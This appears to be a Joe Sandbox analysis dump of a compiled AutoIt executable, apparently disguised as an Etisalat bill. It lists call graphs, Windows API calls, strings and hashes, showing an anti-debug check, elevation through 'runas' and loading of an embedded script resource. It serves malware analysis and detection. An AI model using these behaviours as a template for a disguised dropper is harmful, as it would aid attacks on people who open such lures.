101138->101132 101140 b65d66 ReadFile 101140->101138 101140->101141 101141->101138 101141->101140 101143 b65c4e 2 API calls 101142->101143 101144 b65e60 101143->101144 101145 b65c4e 2 API calls 101144->101145 101146 b65e74 101145->101146 101146->101129 101147->101141 101148->101030 101149->101031 101151 b67a17 101150->101151 101152 b679ba 101150->101152 101153 b67e8c 59 API calls 101151->101153 101152->101151 101154 b679c5 101152->101154 101160 b679e8 _memmove 101153->101160 101155 b679e0 101154->101155 101156 b9ef32 101154->101156 101164 b68087 59 API calls Mailbox 101155->101164 101157 b68189 59 API calls 101156->101157 101159 b9ef3c 101157->101159 101160->101060 101163->101083 101164->101160 101166 b66ef5 101165->101166 101170 b67009 
101165->101170 101167 b80ff6 Mailbox 59 API calls 101166->101167 101166->101170 101169 b66f1c 101167->101169 101168 b80ff6 Mailbox 59 API calls 101175 b66f91 101168->101175 101169->101168 101170->99786 101175->101170 101176->99789 101733 b6107d 101738 b671eb 101733->101738 101735 b6108c 101736 b82f80 __cinit 67 API calls 101735->101736 101737 b61096 101736->101737 101739 b671fb __write_nolock 101738->101739 101740 b677c7 59 API calls 101739->101740 101741 b672b1 101740->101741 101742 b64864 61 API calls 101741->101742 101743 b672ba 101742->101743 101769 b8074f 101743->101769 101746 b67e0b 59 API calls 101747 b672d3 101746->101747 101748 b63f84 59 API calls 101747->101748 101749 b672e2 101748->101749 101750 b677c7 59 API calls 101749->101750 101751 b672eb 101750->101751 101752 b67eec 59 API calls 101751->101752 101753 b672f4 RegOpenKeyExW 101752->101753 101754 b9ecda RegQueryValueExW 101753->101754 101758 b67316 Mailbox 101753->101758 101755 b9ed6c RegCloseKey 101754->101755 101756 b9ecf7 101754->101756 101755->101758 101768 b9ed7e _wcscat Mailbox __wsetenvp 101755->101768 101757 b80ff6 Mailbox 59 API calls 101756->101757 101759 b9ed10 101757->101759 101758->101735 101761 b6538e 59 API calls 101759->101761 101760 b67b52 59 API calls 101760->101768 101762 b9ed1b RegQueryValueExW 101761->101762 101763 b9ed38 101762->101763 101765 b9ed52 101762->101765 101764 b67d2c 59 API calls 101763->101764 101764->101765 101765->101755 101766 b67f41 59 API calls 101766->101768 101767 b63f84 59 API calls 101767->101768 101768->101758 101768->101760 101768->101766 101768->101767 101770 b91b90 __write_nolock 101769->101770 101771 b8075c GetFullPathNameW 101770->101771 101772 b8077e 101771->101772 101773 b67d2c 59 API calls 101772->101773 101774 b672c5 101773->101774 101774->101746 101775 b6568a 101782 b65c18 101775->101782 101781 b656ba Mailbox 101783 b80ff6 Mailbox 59 API calls 101782->101783 101784 b65c2b 101783->101784 101785 b80ff6 Mailbox 59 API calls 101784->101785 101786 b6569c 
101785->101786 101787 b65632 101786->101787 101801 b65a2f 101787->101801 101789 b65674 101789->101781 101793 b681c1 MultiByteToWideChar 101789->101793 101790 b65d20 2 API calls 101791 b65643 101790->101791 101791->101789 101791->101790 101808 b65bda 101791->101808 101794 b681e7 101793->101794 101795 b6822e 101793->101795 101797 b80ff6 Mailbox 59 API calls 101794->101797 101796 b67eec 59 API calls 101795->101796 101800 b68220 101796->101800 101798 b681fc MultiByteToWideChar 101797->101798 101824 b678ad 101798->101824 101800->101781 101802 b65a40 101801->101802 101803 b9e065 101801->101803 101802->101791 101817 bb6443 59 API calls Mailbox 101803->101817 101805 b9e06f 101806 b80ff6 Mailbox 59 API calls 101805->101806 101807 b9e07b 101806->101807 101809 b65bee 101808->101809 101810 b9e117 101808->101810 101818 b65b19 101809->101818 101823 bb6443 59 API calls Mailbox 101810->101823 101813 b65bfa 101813->101791 101814 b9e122 101815 b80ff6 Mailbox 59 API calls 101814->101815 101816 b9e137 _memmove 101815->101816 101817->101805 101819 b65b31 101818->101819 101821 b65b2a _memmove 101818->101821 101820 b80ff6 Mailbox 59 API calls 101819->101820 101822 b9e0a7 101819->101822 101820->101821 101821->101813 101822->101822 101823->101814 101825 b6792f 101824->101825 101826 b678bc 101824->101826 101827 b67e8c 59 API calls 101825->101827 101826->101825 101828 b678c8 101826->101828 101834 b678da _memmove 101827->101834 101829 b678d2 101828->101829 101830 b67900 101828->101830 101836 b68087 59 API calls Mailbox 101829->101836 101831 b68189 59 API calls 101830->101831 101833 b6790a 101831->101833 101835 b80ff6 Mailbox 59 API calls 101833->101835 101834->101800 101835->101834 101836->101834 101837 ba0226 101843 b6ade2 Mailbox 101837->101843 101839 ba0c86 101953 bb66f4 101839->101953 101841 ba0c8f 101843->101839 101843->101841 101844 ba00e0 VariantClear 101843->101844 101845 b6b6c1 101843->101845 101851 bd474d 101843->101851 101860 bcd2e6 101843->101860 101907 bde237 101843->101907 
101910 b72123 101843->101910 101950 b69df0 59 API calls Mailbox 101843->101950 101951 bb7405 59 API calls 101843->101951 101844->101843 101952 bca0b5 89 API calls 4 library calls 101845->101952 101852 b69997 84 API calls 101851->101852 101853 bd4787 101852->101853 101854 b663a0 94 API calls 101853->101854 101855 bd4797 101854->101855 101856 bd47bc 101855->101856 101857 b6a000 341 API calls 101855->101857 101859 bd47c0 101856->101859 101956 b69bf8 101856->101956 101857->101856 101859->101843 101861 bcd305 101860->101861 101862 bcd310 101860->101862 101969 b69c9c 59 API calls 101861->101969 101865 b677c7 59 API calls 101862->101865 101903 bcd3ea Mailbox 101862->101903 101864 b80ff6 Mailbox 59 API calls 101866 bcd433 101864->101866 101867 bcd334 101865->101867 101868 bcd43f 101866->101868 101972 b65906 60 API calls Mailbox 101866->101972 101870 b677c7 59 API calls 101867->101870 101871 b69997 84 API calls 101868->101871 101872 bcd33d 101870->101872 101873 bcd457 101871->101873 101874 b69997 84 API calls 101872->101874 101875 b65956 67 API calls 101873->101875 101876 bcd349 101874->101876 101877 bcd466 101875->101877 101878 b646f9 59 API calls 101876->101878 101879 bcd49e 101877->101879 101880 bcd46a GetLastError 101877->101880 101881 bcd35e 101878->101881 101884 bcd4c9 101879->101884 101885 bcd500 101879->101885 101882 bcd483 101880->101882 101883 b67c8e 59 API calls 101881->101883 101904 bcd3f3 Mailbox 101882->101904 101973 b65a1a CloseHandle 101882->101973 101886 bcd391 101883->101886 101888 b80ff6 Mailbox 59 API calls 101884->101888 101887 b80ff6 Mailbox 59 API calls 101885->101887 101889 bcd3e3 101886->101889 101894 bc3e73 3 API calls 101886->101894 101890 bcd505 101887->101890 101891 bcd4ce 101888->101891 101971 b69c9c 59 API calls 101889->101971 101898 b677c7 59 API calls 101890->101898 101890->101904 101895 bcd4df 101891->101895 101899 b677c7 59 API calls 101891->101899 101896 bcd3a1 101894->101896 101974 bcf835 59 API calls 2 library calls 101895->101974 
101896->101889 101897 bcd3a5 101896->101897 101900 b67f41 59 API calls 101897->101900 101898->101904 101899->101895 101902 bcd3b2 101900->101902 101970 bc3c66 63 API calls Mailbox 101902->101970 101903->101864 101903->101904 101904->101843 101906 bcd3bb Mailbox 101906->101889 101908 bdcdf1 130 API calls 101907->101908 101909 bde247 101908->101909 101909->101843 101911 b69bf8 59 API calls 101910->101911 101912 b7213b 101911->101912 101913 b80ff6 Mailbox 59 API calls 101912->101913 101917 ba69af 101912->101917 101915 b72154 101913->101915 101916 b72164 101915->101916 101990 b65906 60 API calls Mailbox 101915->101990 101920 b69997 84 API calls 101916->101920 101918 b72189 101917->101918 101994 bcf7df 59 API calls 101917->101994 101925 b72196 101918->101925 101995 b69c9c 59 API calls 101918->101995 101922 b72172 101920->101922 101924 b65956 67 API calls 101922->101924 101923 ba69f7 101923->101925 101926 ba69ff 101923->101926 101927 b72181 101924->101927 101929 b65e3f 2 API calls 101925->101929 101996 b69c9c 59 API calls 101926->101996 101927->101917 101927->101918 101993 b65a1a CloseHandle 101927->101993 101931 b7219d 101929->101931 101932 b721b7 101931->101932 101933 ba6a11 101931->101933 101934 b677c7 59 API calls 101932->101934 101935 b80ff6 Mailbox 59 API calls 101933->101935 101936 b721bf 101934->101936 101937 ba6a17 101935->101937 101975 b656d2 101936->101975 101939 ba6a2b 101937->101939 101997 b659b0 ReadFile SetFilePointerEx 101937->101997 101944 ba6a2f _memmove 101939->101944 101998 bc794e 59 API calls 2 library calls 101939->101998 101941 b721ce 101941->101944 101991 b69b9c 59 API calls Mailbox 101941->101991 101945 b721e2 Mailbox 101946 b7221c 101945->101946 101947 b65dcf CloseHandle 101945->101947 101946->101843 101948 b72210 101947->101948 101948->101946 101992 b65a1a CloseHandle 101948->101992 101950->101843 101951->101843 101952->101839 102002 bb6636 101953->102002 101955 bb6702 101955->101841 101957 b9fbff 101956->101957 101958 b69c08 101956->101958 
101959 b9fc10 101957->101959 101961 b67d2c 59 API calls 101957->101961 101963 b80ff6 Mailbox 59 API calls 101958->101963 101960 b67eec 59 API calls 101959->101960 101962 b9fc1a 101960->101962 101961->101959 101966 b69c34 101962->101966 101967 b677c7 59 API calls 101962->101967 101964 b69c1b 101963->101964 101964->101962 101965 b69c26 101964->101965 101965->101966 101968 b67f41 59 API calls 101965->101968 101966->101859 101967->101966 101968->101966 101969->101862 101970->101906 101971->101903 101972->101868 101973->101904 101974->101904 101976 b65702 101975->101976 101978 b656dd 101975->101978 101977 b67eec 59 API calls 101976->101977 101982 bc349a 101977->101982 101978->101976 101981 b656ec 101978->101981 101979 bc34c9 101979->101941 101983 b65c18 59 API calls 101981->101983 101982->101979 101999 bc3436 ReadFile SetFilePointerEx 101982->101999 102000 b67a84 59 API calls 2 library calls 101982->102000 101984 bc35ba 101983->101984 101986 b65632 61 API calls 101984->101986 101987 bc35c8 101986->101987 101989 bc35d8 Mailbox 101987->101989 102001 b6793a 61 API calls Mailbox 101987->102001 101989->101941 101990->101916 101991->101945 101992->101946 101993->101917 101994->101917 101995->101923 101996->101931 101997->101939 101998->101944 101999->101982 102000->101982 102001->101989 102003 bb665e 102002->102003 102004 bb6641 102002->102004 102003->101955 102004->102003 102006 bb6621 59 API calls Mailbox 102004->102006 102006->102004 102007 b6e608 102010 b6d260 102007->102010 102009 b6e616 102011 b6d4dd 102010->102011 102012 b6d27d 102010->102012 102024 b6d6ab 102011->102024 102059 bca0b5 89 API calls 4 library calls 102011->102059 102013 ba2b0a 102012->102013 102014 ba2abb 102012->102014 102018 b6d2a4 102012->102018 102054 bda6fb 341 API calls __cinit 102013->102054 102016 ba2abe 102014->102016 102025 ba2ad9 102014->102025 102016->102018 102019 ba2aca 102016->102019 102018->102011 102020 b82f80 __cinit 67 API calls 102018->102020 102018->102024 102029 ba2c26 
102018->102029 102033 b68620 69 API calls 102018->102033 102035 b6d594 102018->102035 102041 b6a000 341 API calls 102018->102041 102042 b681a7 59 API calls 102018->102042 102044 b688a0 68 API calls __cinit 102018->102044 102045 b686a2 68 API calls 102018->102045 102047 b6859a 68 API calls 102018->102047 102048 b6d0dc 341 API calls 102018->102048 102049 b69f3a 59 API calls Mailbox 102018->102049 102050 b6d060 89 API calls 102018->102050 102051 b6cedd 341 API calls 102018->102051 102055 b68bb2 68 API calls 102018->102055 102056 b69e9c 60 API calls Mailbox 102018->102056 102057 bb6d03 60 API calls 102018->102057 102052 bdad0f 341 API calls 102019->102052 102020->102018 102023 ba2cdf 102023->102023 102024->102009 102025->102011 102053 bdb1b7 341 API calls 3 library calls 102025->102053 102058 bdaa66 89 API calls 102029->102058 102030 b6d5a3 102030->102009 102033->102018 102046 b68bb2 68 API calls 102035->102046 102041->102018 102042->102018 102044->102018 102045->102018 102046->102030 102047->102018 102048->102018 102049->102018 102050->102018 102051->102018 102052->102024 102053->102011 102054->102018 102055->102018 102056->102018 102057->102018 102058->102011 102059->102023 102060 15e2410 102074 15e0000 102060->102074 102062 15e24d1 102077 15e2300 102062->102077 102080 15e3500 GetPEB 102074->102080 102076 15e068b 102076->102062 102078 15e2309 Sleep 102077->102078 102079 15e2317 102078->102079 102081 15e352a 102080->102081 102081->102076 102082 b9ff06 102083 b9ff10 102082->102083 102116 b6ac90 Mailbox _memmove 102082->102116 102181 b68e34 59 API calls Mailbox 102083->102181 102089 b6b5d5 102092 b681a7 59 API calls 102089->102092 102090 b80ff6 59 API calls Mailbox 102109 b6a097 Mailbox 102090->102109 102103 b6a1b7 102092->102103 102093 ba047f 102185 bca0b5 89 API calls 4 library calls 102093->102185 102094 b6b5da 102191 bca0b5 89 API calls 4 library calls 102094->102191 102096 b681a7 59 API calls 102096->102109 102097 b67f41 59 API calls 102097->102116 102099 b677c7 59 
API calls 102099->102109 102101 ba048e 102102 b82f80 67 API calls __cinit 102102->102109 102105 bb7405 59 API calls 102105->102109 102106 bb66f4 Mailbox 59 API calls 102106->102103 102107 ba0e00 102190 bca0b5 89 API calls 4 library calls 102107->102190 102109->102089 102109->102090 102109->102093 102109->102094 102109->102096 102109->102099 102109->102102 102109->102103 102109->102105 102109->102107 102111 b6a6ba 102109->102111 102175 b6ca20 341 API calls 2 library calls 102109->102175 102176 b6ba60 60 API calls Mailbox 102109->102176 102110 bdbf80 341 API calls 102110->102116 102189 bca0b5 89 API calls 4 library calls 102111->102189 102112 bb66f4 Mailbox 59 API calls 102112->102116 102113 b6b416 102180 b6f803 341 API calls 102113->102180 102115 b6a000 341 API calls 102115->102116 102116->102097 102116->102103 102116->102109 102116->102110 102116->102112 102116->102113 102116->102115 102117 ba0c94 102116->102117 102119 ba0ca2 102116->102119 102122 b6b37c 102116->102122 102123 b80ff6 59 API calls Mailbox 102116->102123 102128 b6b685 102116->102128 102131 b6ade2 Mailbox 102116->102131 102137 bdc5f4 102116->102137 102169 bc7be0 102116->102169 102182 bb7405 59 API calls 102116->102182 102183 bdc4a7 85 API calls 2 library calls 102116->102183 102187 b69df0 59 API calls Mailbox 102117->102187 102188 bca0b5 89 API calls 4 library calls 102119->102188 102121 ba0c86 102121->102103 102121->102106 102178 b69e9c 60 API calls Mailbox 102122->102178 102123->102116 102125 b6b38d 102179 b69e9c 60 API calls Mailbox 102125->102179 102186 bca0b5 89 API calls 4 library calls 102128->102186 102131->102103 102131->102121 102131->102128 102132 ba00e0 VariantClear 102131->102132 102133 bd474d 341 API calls 102131->102133 102134 b72123 95 API calls 102131->102134 102135 bcd2e6 101 API calls 102131->102135 102136 bde237 130 API calls 102131->102136 102177 b69df0 59 API calls Mailbox 102131->102177 102184 bb7405 59 API calls 102131->102184 102132->102131 102133->102131 102134->102131 
102135->102131 102136->102131 102138 b677c7 59 API calls 102137->102138 102139 bdc608 102138->102139 102140 b677c7 59 API calls 102139->102140 102141 bdc610 102140->102141 102142 b677c7 59 API calls 102141->102142 102143 bdc618 102142->102143 102144 b69997 84 API calls 102143->102144 102168 bdc626 102144->102168 102145 b67d2c 59 API calls 102145->102168 102146 bdc80f 102147 bdc83c Mailbox 102146->102147 102193 b69b9c 59 API calls Mailbox 102146->102193 102147->102116 102148 bdc7f6 102151 b67e0b 59 API calls 102148->102151 102150 bdc811 102154 b67e0b 59 API calls 102150->102154 102152 bdc803 102151->102152 102156 b67c8e 59 API calls 102152->102156 102153 b67a84 59 API calls 102153->102168 102157 bdc820 102154->102157 102155 b681a7 59 API calls 102155->102168 102156->102146 102159 b67c8e 59 API calls 102157->102159 102158 b67faf 59 API calls 102161 bdc6bd CharUpperBuffW 102158->102161 102159->102146 102160 b67faf 59 API calls 102162 bdc77d CharUpperBuffW 102160->102162 102192 b6859a 68 API calls 102161->102192 102164 b6c707 69 API calls 102162->102164 102164->102168 102165 b69997 84 API calls 102165->102168 102166 b67e0b 59 API calls 102166->102168 102167 b67c8e 59 API calls 102167->102168 102168->102145 102168->102146 102168->102147 102168->102148 102168->102150 102168->102153 102168->102155 102168->102158 102168->102160 102168->102165 102168->102166 102168->102167 102170 bc7bec 102169->102170 102171 b80ff6 Mailbox 59 API calls 102170->102171 102172 bc7bfa 102171->102172 102173 bc7c08 102172->102173 102174 b677c7 59 API calls 102172->102174 102173->102116 102174->102173 102175->102109 102176->102109 102177->102131 102178->102125 102179->102113 102180->102128 102181->102116 102182->102116 102183->102116 102184->102131 102185->102101 102186->102121 102187->102121 102188->102121 102189->102103 102190->102094 102191->102103 102192->102168 102193->102147

                                      Control-flow Graph

                                      APIs
                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B63B7A
                                      • IsDebuggerPresent.KERNEL32 ref: 00B63B8C
                                      • GetFullPathNameW.KERNEL32(00007FFF,?,?,00C262F8,00C262E0,?,?), ref: 00B63BFD
                                        • Part of subcall function 00B67D2C: _memmove.LIBCMT ref: 00B67D66
                                        • Part of subcall function 00B70A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00B63C26,00C262F8,?,?,?), ref: 00B70ACE
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00B63C81
                                      • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00C193F0,00000010), ref: 00B9D4BC
                                      • SetCurrentDirectoryW.KERNEL32(?,00C262F8,?,?,?), ref: 00B9D4F4
                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00C15D40,00C262F8,?,?,?), ref: 00B9D57A
                                      • ShellExecuteW.SHELL32(00000000,?,?), ref: 00B9D581
                                        • Part of subcall function 00B63A58: GetSysColorBrush.USER32(0000000F), ref: 00B63A62
                                        • Part of subcall function 00B63A58: LoadCursorW.USER32(00000000,00007F00), ref: 00B63A71
                                        • Part of subcall function 00B63A58: LoadIconW.USER32(00000063), ref: 00B63A88
                                        • Part of subcall function 00B63A58: LoadIconW.USER32(000000A4), ref: 00B63A9A
                                        • Part of subcall function 00B63A58: LoadIconW.USER32(000000A2), ref: 00B63AAC
                                        • Part of subcall function 00B63A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00B63AD2
                                        • Part of subcall function 00B63A58: RegisterClassExW.USER32(?), ref: 00B63B28
                                        • Part of subcall function 00B639E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00B63A15
                                        • Part of subcall function 00B639E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00B63A36
                                        • Part of subcall function 00B639E7: ShowWindow.USER32(00000000,?,?), ref: 00B63A4A
                                        • Part of subcall function 00B639E7: ShowWindow.USER32(00000000,?,?), ref: 00B63A53
                                        • Part of subcall function 00B643DB: _memset.LIBCMT ref: 00B64401
                                        • Part of subcall function 00B643DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00B644A6
                                      Strings
                                      • runas, xrefs: 00B9D575
                                      • This is a third-party compiled AutoIt script., xrefs: 00B9D4B4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                      • String ID: This is a third-party compiled AutoIt script.$runas
                                      • API String ID: 529118366-3287110873
                                      • Opcode ID: 7257fdccccb4901f8c59cc379709b69ce4da077f2693238e0d6d61b9f1090739
                                      • Instruction ID: ef88a44e6540df9d52c8b7798dba40dc8ccbcecd6995b172d2e3234cf7b05d57
                                      • Opcode Fuzzy Hash: 7257fdccccb4901f8c59cc379709b69ce4da077f2693238e0d6d61b9f1090739
                                      • Instruction Fuzzy Hash: 8751D270908289EACF21EBB4EC55FFD7BF8EB44704B0041F5F451A62A1DE785A46DB21

                                      Control-flow Graph

                                      APIs
                                      • GetVersionExW.KERNEL32(?), ref: 00B64B2B
                                        • Part of subcall function 00B67D2C: _memmove.LIBCMT ref: 00B67D66
                                      • GetCurrentProcess.KERNEL32(?,00BEFAEC,00000000,00000000,?), ref: 00B64BF8
                                      • IsWow64Process.KERNEL32(00000000), ref: 00B64BFF
                                      • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00B64C45
                                      • FreeLibrary.KERNEL32(00000000), ref: 00B64C50
                                      • GetSystemInfo.KERNEL32(00000000), ref: 00B64C81
                                      • GetSystemInfo.KERNEL32(00000000), ref: 00B64C8D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                      • String ID:
                                      • API String ID: 1986165174-0
                                      • Opcode ID: 9d14a5d73023ae6ee0d7cd91afcabded28be8a9bea58dc21d8f18b7cf867f7f6
                                      • Instruction ID: 9d22855bc08e5f10649f4841d4be6765e77d49e2bab5b5dc1767d56204ef279d
                                      • Opcode Fuzzy Hash: 9d14a5d73023ae6ee0d7cd91afcabded28be8a9bea58dc21d8f18b7cf867f7f6
                                      • Instruction Fuzzy Hash: 3A91C57154ABC4DECB31CB6885916AABFF4EF26300B484EEDD0CA97B01D724E948C719

                                      Control-flow Graph

                                      control_flow_graph 1063 b64fe9-b65001 CreateStreamOnHGlobal 1064 b65003-b6501a FindResourceExW 1063->1064 1065 b65021-b65026 1063->1065 1066 b9dd5c-b9dd6b LoadResource 1064->1066 1067 b65020 1064->1067 1066->1067 1068 b9dd71-b9dd7f SizeofResource 1066->1068 1067->1065 1068->1067 1069 b9dd85-b9dd90 LockResource 1068->1069 1069->1067 1070 b9dd96-b9ddb4 1069->1070 1070->1067
                                      APIs
                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00B64EEE,?,?,00000000,00000000), ref: 00B64FF9
                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00B64EEE,?,?,00000000,00000000), ref: 00B65010
                                      • LoadResource.KERNEL32(?,00000000,?,?,00B64EEE,?,?,00000000,00000000,?,?,?,?,?,?,00B64F8F), ref: 00B9DD60
                                      • SizeofResource.KERNEL32(?,00000000,?,?,00B64EEE,?,?,00000000,00000000,?,?,?,?,?,?,00B64F8F), ref: 00B9DD75
                                      • LockResource.KERNEL32(00B64EEE,?,?,00B64EEE,?,?,00000000,00000000,?,?,?,?,?,?,00B64F8F,00000000), ref: 00B9DD88
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                      • String ID: SCRIPT
                                      • API String ID: 3051347437-3967369404
                                      • Opcode ID: 933ebea202fafbacbc378fc0139c8b41d61d379d4da8b1b25fcdb4a8807bb2de
                                      • Instruction ID: 81d92c2c33043bc7d5222c3f45740a2645946228a785290df4af0562da8c6767
                                      • Opcode Fuzzy Hash: 933ebea202fafbacbc378fc0139c8b41d61d379d4da8b1b25fcdb4a8807bb2de
                                      • Instruction Fuzzy Hash: 6D115A75200746AFDB318B65DC98F677BB9FBC9B11F2081A8F5068A260DB61EC008660
                                      APIs
                                      • GetFileAttributesW.KERNELBASE(?,00B9E7C1), ref: 00BC46A6
                                      • FindFirstFileW.KERNELBASE(?,?), ref: 00BC46B7
                                      • FindClose.KERNEL32(00000000), ref: 00BC46C7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: FileFind$AttributesCloseFirst
                                      • String ID:
                                      • API String ID: 48322524-0
                                      • Opcode ID: c6eb025fbe59c636cd73a99f9f4b71f6bfd95bbe575cb79064c60427021b0db6
                                      • Instruction ID: 33a581225fd8d5321a3dcb566c61839a06da2353cbc4595c8b90aeab8301561e
                                      • Opcode Fuzzy Hash: c6eb025fbe59c636cd73a99f9f4b71f6bfd95bbe575cb79064c60427021b0db6
                                      • Instruction Fuzzy Hash: ECE0D8318105015B42106738EC9D8FA779CDE06335F1007A9F936C20E0EBB09E509599
                                      Strings
                                      • Variable must be of type 'Object'., xrefs: 00BA428C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Variable must be of type 'Object'.
                                      • API String ID: 0-109567571
                                      • Opcode ID: 414df24baf1de3a30abb67ab2e15052d2a57bbccc18fa2f8938912c5c6527057
                                      • Instruction ID: 27f6398653c0155bf003eba07af18503a88000f41602e109264d2b7dcd1238bd
                                      • Opcode Fuzzy Hash: 414df24baf1de3a30abb67ab2e15052d2a57bbccc18fa2f8938912c5c6527057
                                      • Instruction Fuzzy Hash: 67A24B78A04205CFCB24CF58D4D0AAAB7F1FF59304F2481A9E926AB351D779ED42CB91
                                      APIs
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B70BBB
                                      • timeGetTime.WINMM ref: 00B70E76
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B70FB3
                                      • TranslateMessage.USER32(?), ref: 00B70FC7
                                      • DispatchMessageW.USER32(?), ref: 00B70FD5
                                      • Sleep.KERNEL32(0000000A), ref: 00B70FDF
                                      • LockWindowUpdate.USER32(00000000,?,?), ref: 00B7105A
                                      • DestroyWindow.USER32 ref: 00B71066
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B71080
                                      • Sleep.KERNEL32(0000000A,?,?), ref: 00BA52AD
                                      • TranslateMessage.USER32(?), ref: 00BA608A
                                      • DispatchMessageW.USER32(?), ref: 00BA6098
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BA60AC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
